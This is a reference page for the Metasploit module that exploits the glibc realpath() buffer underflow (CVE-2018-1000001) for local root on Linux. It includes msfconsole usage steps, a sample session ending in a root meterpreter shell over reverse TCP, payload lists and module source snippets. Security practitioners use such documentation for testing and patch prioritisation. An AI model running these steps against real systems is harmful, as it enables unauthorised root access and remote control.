glibc 'realpath()' Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/glibc_realpath_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: glibc 'realpath()' Privilege Escalation
Module: exploit/linux/local/glibc_realpath_priv_esc
Source code: modules/exploits/linux/local/glibc_realpath_priv_esc.rb
Disclosure date: 2018-01-16
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2018-1000001

This module is also known as RationalLove.c.

This module attempts to gain root privileges on Linux systems by abusing a vulnerability in GNU C Library (glibc) version 2.26 and prior. This module uses halfdog's RationalLove exploit to exploit a buffer underflow in glibc realpath() and create a SUID root shell. The exploit has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1. The target system must have unprivileged user namespaces enabled. This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64) with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc version 2.24-11+deb9u1.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/glibc_realpath_priv_esc
msf exploit(glibc_realpath_priv_esc) > show targets
    ... a list of targets ...
msf exploit(glibc_realpath_priv_esc) > set TARGET target-id
msf exploit(glibc_realpath_priv_esc) > show options
    ... show and set options ...
msf exploit(glibc_realpath_priv_esc) > set SESSION session-id
msf exploit(glibc_realpath_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module attempts to gain root privileges on Linux systems by abusing a vulnerability in GNU C Library (glibc) version 2.26 and prior.

This module uses halfdog's RationalLove exploit to exploit a buffer underflow in glibc realpath() and create a SUID root shell. The exploit has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1.

The target system must have unprivileged user namespaces enabled.

Vulnerable Application


This module has been tested successfully on:

  • Ubuntu Linux 16.04.3 (x86_64) with glibc version 2.23-0ubuntu9
  • Debian 9.0 (x86_64) with glibc version 2.24-11+deb9u1

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. use exploit/linux/local/glibc_realpath_priv_esc
  4. set SESSION [SESSION]
  5. check
  6. run
  7. You should get a new root session

Options


SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

COMPILE

Options: Auto True False (default: Auto)

Whether the exploit should be live compiled with gcc on the target system, or uploaded as a pre-compiled binary.

Auto will first determine if gcc is installed to compile live on the system, and fall back to uploading a pre-compiled binary.

Scenarios


  msf5 > use exploit/linux/local/glibc_realpath_priv_esc 
  msf5 exploit(linux/local/glibc_realpath_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/glibc_realpath_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.DhRxy0FQR.c' (35470 bytes) ...
  [*] Writing '/tmp/.Piya56UZVV' (207 bytes) ...
  [*] Launching exploit...
  [*] Sending stage (853256 bytes) to 172.16.191.171

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.171
  OS           : Ubuntu 16.04 (Linux 4.10.0-28-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux

Go back to menu.

Msfconsole Usage


Here is how the linux/local/glibc_realpath_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/glibc_realpath_priv_esc

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/glibc_realpath_priv_esc) > show info

       Name: glibc 'realpath()' Privilege Escalation
     Module: exploit/linux/local/glibc_realpath_priv_esc
   Platform: Linux
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-01-16

Provided by:
  halfdog
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This module attempts to gain root privileges on Linux systems by 
  abusing a vulnerability in GNU C Library (glibc) version 2.26 and 
  prior. This module uses halfdog's RationalLove exploit to exploit a 
  buffer underflow in glibc realpath() and create a SUID root shell. 
  The exploit has offsets for glibc versions 2.23-0ubuntu9 and 
  2.24-11+deb9u1. The target system must have unprivileged user 
  namespaces enabled. This module has been tested successfully on 
  Ubuntu Linux 16.04.3 (x86_64) with glibc version 2.23-0ubuntu9; and 
  Debian 9.0 (x86_64) with glibc version 2.24-11+deb9u1.

References:
  http://www.securityfocus.com/bid/102525
  https://nvd.nist.gov/vuln/detail/CVE-2018-1000001
  https://www.exploit-db.com/exploits/43775
  https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
  http://www.openwall.com/lists/oss-security/2018/01/11/5
  https://securitytracker.com/id/1040162
  https://sourceware.org/bugzilla/show_bug.cgi?id=22679
  https://usn.ubuntu.com/3534-1/
  https://bugzilla.redhat.com/show_bug.cgi?id=1533836

Also known as:
  RationalLove.c

Module Options


This is a complete list of options available in the linux/local/glibc_realpath_priv_esc exploit:

msf6 exploit(linux/local/glibc_realpath_priv_esc) > show options

Module options (exploit/linux/local/glibc_realpath_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                   yes       The session to run this module on.

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options


Here is a complete list of advanced options supported by the linux/local/glibc_realpath_priv_esc exploit:

msf6 exploit(linux/local/glibc_realpath_priv_esc) > show advanced

Module advanced options (exploit/linux/local/glibc_realpath_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ForceExploit            false            no        Override check result
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/glibc_realpath_priv_esc module can exploit:

msf6 exploit(linux/local/glibc_realpath_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/glibc_realpath_priv_esc exploit:

msf6 exploit(linux/local/glibc_realpath_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/adduser                                          normal  No     Linux Add User
   19  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   20  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   22  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   23  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   24  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   25  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   26  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   27  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   30  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   31  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   32  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   33  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   34  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   35  payload/linux/x86/read_file                                        normal  No     Linux Read File
   36  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   37  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   38  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   39  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   40  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   41  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   42  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   45  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   46  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   47  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   48  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   49  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/glibc_realpath_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/glibc_realpath_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PATH>.c failed to compile


Here is a relevant code snippet related to the "<PATH>.c failed to compile" error message:

93:	    end
94:	    output = cmd_exec gcc_cmd
95:	
96:	    unless output.blank?
97:	      print_error output
98:	      fail_with Failure::Unknown, "#{path}.c failed to compile"
99:	    end
100:	
101:	    register_file_for_cleanup path
102:	    cmd_exec "chmod +x #{path}"
103:	  end

gcc is not installed. Compiling will fail.


Here is a relevant code snippet related to the "gcc is not installed. Compiling will fail." error message:

117:	      vprint_good 'gcc is installed'
118:	      return true
119:	    end
120:	
121:	    unless datastore['COMPILE'].eql? 'Auto'
122:	      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
123:	    end
124:	  end
125:	
126:	  def check
127:	    version = kernel_release

Linux kernel version <VERSION> is not vulnerable


Here is a relevant code snippet related to the "Linux kernel version <VERSION> is not vulnerable" error message:

124:	  end
125:	
126:	  def check
127:	    version = kernel_release
128:	    if Rex::Version.new(version.split('-').first) < Rex::Version.new('2.6.36')
129:	      vprint_error "Linux kernel version #{version} is not vulnerable"
130:	      return CheckCode::Safe
131:	    end
132:	    vprint_good "Linux kernel version #{version} is vulnerable"
133:	
134:	    arch = kernel_hardware

System architecture <ARCH> is not supported


Here is a relevant code snippet related to the "System architecture <ARCH> is not supported" error message:

131:	    end
132:	    vprint_good "Linux kernel version #{version} is vulnerable"
133:	
134:	    arch = kernel_hardware
135:	    unless arch.include? 'x86_64'
136:	      vprint_error "System architecture #{arch} is not supported"
137:	      return CheckCode::Safe
138:	    end
139:	    vprint_good "System architecture #{arch} is supported"
140:	
141:	    version = glibc_version

GNU C Library version <VERSION> is not vulnerable


Here is a relevant code snippet related to the "GNU C Library version <VERSION> is not vulnerable" error message:

138:	    end
139:	    vprint_good "System architecture #{arch} is supported"
140:	
141:	    version = glibc_version
142:	    if Rex::Version.new(version.split('-').first) > Rex::Version.new('2.26')
143:	      vprint_error "GNU C Library version #{version} is not vulnerable"
144:	      return CheckCode::Safe
145:	    end
146:	    vprint_good "GNU C Library version #{version} is vulnerable"
147:	
148:	    # fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1

No offsets for this version of GNU C Library


Here is a relevant code snippet related to the "No offsets for this version of GNU C Library" error message:

146:	    vprint_good "GNU C Library version #{version} is vulnerable"
147:	
148:	    # fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1
149:	    glibc_banner = cmd_exec('ldd --version')
150:	    unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9')
151:	      vprint_error 'No offsets for this version of GNU C Library'
152:	      return CheckCode::Safe
153:	    end
154:	
155:	    config = kernel_config
156:	    if config.nil?

Could not retrieve kernel config


Here is a relevant code snippet related to the "Could not retrieve kernel config" error message:

152:	      return CheckCode::Safe
153:	    end
154:	
155:	    config = kernel_config
156:	    if config.nil?
157:	      vprint_error 'Could not retrieve kernel config'
158:	      return CheckCode::Unknown
159:	    end
160:	
161:	    unless config.include? 'CONFIG_USER_NS=y'
162:	      vprint_error 'Kernel config does not include CONFIG_USER_NS'

Kernel config does not include CONFIG_USER_NS


Here is a relevant code snippet related to the "Kernel config does not include CONFIG_USER_NS" error message:

157:	      vprint_error 'Could not retrieve kernel config'
158:	      return CheckCode::Unknown
159:	    end
160:	
161:	    unless config.include? 'CONFIG_USER_NS=y'
162:	      vprint_error 'Kernel config does not include CONFIG_USER_NS'
163:	      return CheckCode::Safe
164:	    end
165:	    vprint_good 'Kernel config has CONFIG_USER_NS enabled'
166:	
167:	    unless userns_enabled?

Unprivileged user namespaces are not permitted


Here is a relevant code snippet related to the "Unprivileged user namespaces are not permitted" error message:

163:	      return CheckCode::Safe
164:	    end
165:	    vprint_good 'Kernel config has CONFIG_USER_NS enabled'
166:	
167:	    unless userns_enabled?
168:	      vprint_error 'Unprivileged user namespaces are not permitted'
169:	      return CheckCode::Safe
170:	    end
171:	    vprint_good 'Unprivileged user namespaces are permitted'
172:	
173:	    CheckCode::Appears

Session already has root privileges. Set ForceExploit to override.


Here is a relevant code snippet related to the "Session already has root privileges. Set ForceExploit to override." error message:

174:	  end
175:	
176:	  def exploit
177:	    if is_root?
178:	      unless datastore['ForceExploit']
179:	        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
180:	      end
181:	    end
182:	
183:	    unless writable? base_dir
184:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"

<BASE_DIR> is not writable


Here is a relevant code snippet related to the "<BASE_DIR> is not writable" error message:

179:	        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
180:	      end
181:	    end
182:	
183:	    unless writable? base_dir
184:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"
185:	    end
186:	
187:	    unless writable? base_dir
188:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"
189:	    end

<BASE_DIR> is not writable


Here is a relevant code snippet related to the "<BASE_DIR> is not writable" error message:

183:	    unless writable? base_dir
184:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"
185:	    end
186:	
187:	    unless writable? base_dir
188:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"
189:	    end
190:	
191:	    # Upload exploit executable
192:	    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
193:	    @executable_path = "#{base_dir}/#{executable_name}"

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • halfdog
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.